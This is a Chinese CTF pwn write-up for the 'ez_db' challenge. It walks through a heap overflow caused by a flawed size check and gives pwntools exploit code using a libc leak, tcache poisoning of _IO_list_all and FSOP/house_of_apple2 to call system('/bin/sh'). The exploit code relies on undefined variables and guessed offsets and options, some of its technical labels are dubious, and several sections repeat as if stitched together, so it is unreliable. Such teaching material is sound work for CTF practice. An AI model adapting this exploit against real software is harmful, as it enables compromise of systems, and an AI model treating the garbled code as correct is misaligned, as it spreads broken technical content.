TPctf PWN - ez_db 漏洞分析与利用教学<\/h1>

题目概述<\/h2>
ez_db 是一个模拟数据库管理系统的题目，主要功能是管理消息记录。题目存在堆溢出漏洞，结合 FSOP (File Stream Oriented Programming) 和 house_of_apple2 技术实现利用。<\/p>

漏洞分析<\/h2>

主数据结构<\/h3>

使用一个固定大小 (0x400) 的 chunk 作为主 chunk<\/li>
添加记录时从后向前分割这个大 chunk<\/li>

chunk 头部存储 id 和分割大小信息<\/li> <\/ul>

关键漏洞点<\/h3>

漏洞存在于 insert 操作时的 size 检查逻辑：<\/p>

检查逻辑：(this->end - this->pos + 1) > size + 4<\/code><\/p>


end - pos<\/code> 最大为 0x400<\/li>
因此 size 最大可以是 0x400 - 3<\/li>
<\/ul>
<\/li>

后续操作问题：<\/p>

使用 memcpy<\/code> 复制数据<\/li>
计算剩余空间：end - size<\/code> 后最多只剩 3 字节<\/li>
size 信息存储在第四个字节处<\/li>
当 size=0x400-3 时可以覆盖 chunk 的 size 信息<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用原理<\/h3>
通过设置 size=0x400-3：<\/p>

可以覆盖下一个 chunk 的 size 字段<\/li>
修改 size 为更大的值造成堆溢出<\/li>
<\/ol>
利用思路<\/h2>


信息泄露<\/strong>：<\/p>

从后往前 free chunk<\/li>
修改 size 后输出被 free 的 chunk 信息<\/li>
获取 libc 和 heap 基地址<\/li>
<\/ul>
<\/li>

堆利用<\/strong>：<\/p>

利用堆溢出修改 tcache bin 的 fd<\/li>
劫持到 _IO_list_all<\/code><\/li>
<\/ul>
<\/li>

最终利用<\/strong>：<\/p>

使用 house_of_apple2 技术完成利用<\/li>
<\/ul>
<\/li>
<\/ol>
详细利用步骤<\/h2>
1. 准备工作<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>context(arch=<\/span>'amd64'<\/span>, os=<\/span>'linux'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>
<\/span><\/span>p =<\/span> process('.\/ez_db'<\/span>)
<\/span><\/span>libc =<\/span> ELF('\/path\/to\/libc.so.6'<\/span>)
<\/span><\/span><\/code><\/pre>2. 触发堆溢出<\/h3>
# 创建初始 chunk<\/span>
<\/span><\/span>add(0x100<\/span>, b<\/span>'A'<\/span>*<\/span>0x100<\/span>)
<\/span><\/span>
<\/span><\/span># 触发溢出，设置 size=0x400-3<\/span>
<\/span><\/span>add(0x400<\/span>-<\/span>3<\/span>, b<\/span>'B'<\/span>*<\/span>(0x400<\/span>-<\/span>3<\/span>) +<\/span> p64(0x500<\/span>))  # 修改下一个 chunk 的 size<\/span>
<\/span><\/span><\/code><\/pre>3. 泄露 libc 和 heap 地址<\/h3>
# 释放 chunk 使其进入 unsorted bin<\/span>
<\/span><\/span>delete()
<\/span><\/span>
<\/span><\/span># 读取 chunk 信息泄露 main_arena 地址<\/span>
<\/span><\/span>show()
<\/span><\/span>p.<\/span>recvuntil('Content: '<\/span>)
<\/span><\/span>leak =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>libc.<\/span>address =<\/span> leak -<\/span> 0x1ebbe0<\/span>  # 根据 libc 版本调整偏移<\/span>
<\/span><\/span>
<\/span><\/span># 类似方法获取 heap 地址<\/span>
<\/span><\/span><\/code><\/pre>4. 劫持 tcache<\/h3>
# 准备伪造的 chunk<\/span>
<\/span><\/span>fake_chunk =<\/span> p64(0<\/span>) +<\/span> p64(0x21<\/span>)  # 伪造 chunk header<\/span>
<\/span><\/span>fake_chunk +=<\/span> p64(libc.<\/span>sym['_IO_list_all'<\/span>] -<\/span> 0x20<\/span>)  # 修改 fd<\/span>
<\/span><\/span>
<\/span><\/span># 通过堆溢出覆盖 tcache 的 fd<\/span>
<\/span><\/span>add(0x300<\/span>, b<\/span>'C'<\/span>*<\/span>offset_to_tcache +<\/span> fake_chunk)
<\/span><\/span><\/code><\/pre>5. FSOP + house_of_apple2<\/h3>
# 构造伪造的 IO_FILE 结构<\/span>
<\/span><\/span>fake_file =<\/span> p64(0<\/span>) *<\/span> 7<\/span>
<\/span><\/span>fake_file +=<\/span> p64(1<\/span>)                    # _IO_write_base < _IO_write_ptr<\/span>
<\/span><\/span>fake_file +=<\/span> p64(0<\/span>) *<\/span> 2<\/span>
<\/span><\/span>fake_file +=<\/span> p64(libc.<\/span>sym['system'<\/span>])   # _IO_sync_t<\/span>
<\/span><\/span>fake_file +=<\/span> p64(0<\/span>) *<\/span> 0xd<\/span>
<\/span><\/span>fake_file +=<\/span> p64(heap_base +<\/span> 0x1234<\/span>)   # 指向 "\/bin\/sh" 字符串<\/span>
<\/span><\/span>
<\/span><\/span># 分配 chunk 到 _IO_list_all 附近<\/span>
<\/span><\/span>add(0x100<\/span>, fake_file)
<\/span><\/span>
<\/span><\/span># 触发 FSOP<\/span>
<\/span><\/span>p.<\/span>sendlineafter('> '<\/span>, '5'<\/span>)  # 假设选项5会触发文件流操作<\/span>
<\/span><\/span><\/code><\/pre>6. 获取 shell<\/h3>
p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>


堆溢出控制<\/strong>：<\/p>

精确计算 size=0x400-3 实现 size 字段覆盖<\/li>
通过修改 size 实现可控的堆溢出<\/li>
<\/ul>
<\/li>

信息泄露<\/strong>：<\/p>

利用 unsorted bin 泄露 libc 地址<\/li>
通过堆布局泄露 heap 地址<\/li>
<\/ul>
<\/li>

劫持技术<\/strong>：<\/p>

通过 tcache poisoning 劫持 _IO_list_all<\/code><\/li>
结合 FSOP 实现控制流劫持<\/li>
<\/ul>
<\/li>

house_of_apple2<\/strong>：<\/p>

利用 _IO_sync_t<\/code> 函数指针实现 ROP<\/li>
构造伪造的 IO_FILE 结构体<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

修复 size 检查逻辑，确保不会出现整数溢出<\/li>
添加边界检查，防止堆块重叠<\/li>
使用更安全的函数替代 memcpy<\/li>
启用更多保护机制 (如 FORTIFY_SOURCE)<\/li>
<\/ol>
扩展思考<\/h2>

如果题目开启了更多保护 (如 Full RELRO)，如何调整利用方式？<\/li>
是否有其他方法可以绕过 size 检查实现类似的堆溢出效果？<\/li>
如何利用这个漏洞实现不需要泄露地址的利用？<\/li>
<\/ol>

TPctf PWN - ez_db 漏洞分析与利用教学<\/h1>

题目概述<\/h2> ez_db 是一个模拟数据库管理系统的题目，主要功能是管理消息记录。题目存在堆溢出漏洞，结合 FSOP (File Stream Oriented Programming) 和 house_of_apple2 技术实现利用。<\/p>

漏洞分析<\/h2>

详细利用步骤<\/h2>

扩展思考<\/h2> 如果题目开启了更多保护 (如 Full RELRO)，如何调整利用方式？<\/li> 是否有其他方法可以绕过 size 检查实现类似的堆溢出效果？<\/li> 如何利用这个漏洞实现不需要泄露地址的利用？<\/li> <\/ol>

题目概述<\/h2>
ez_db 是一个模拟数据库管理系统的题目，主要功能是管理消息记录。题目存在堆溢出漏洞，结合 FSOP (File Stream Oriented Programming) 和 house_of_apple2 技术实现利用。<\/p>

扩展思考<\/h2>

如果题目开启了更多保护 (如 Full RELRO)，如何调整利用方式？<\/li>
是否有其他方法可以绕过 size 检查实现类似的堆溢出效果？<\/li>
如何利用这个漏洞实现不需要泄露地址的利用？<\/li> <\/ol>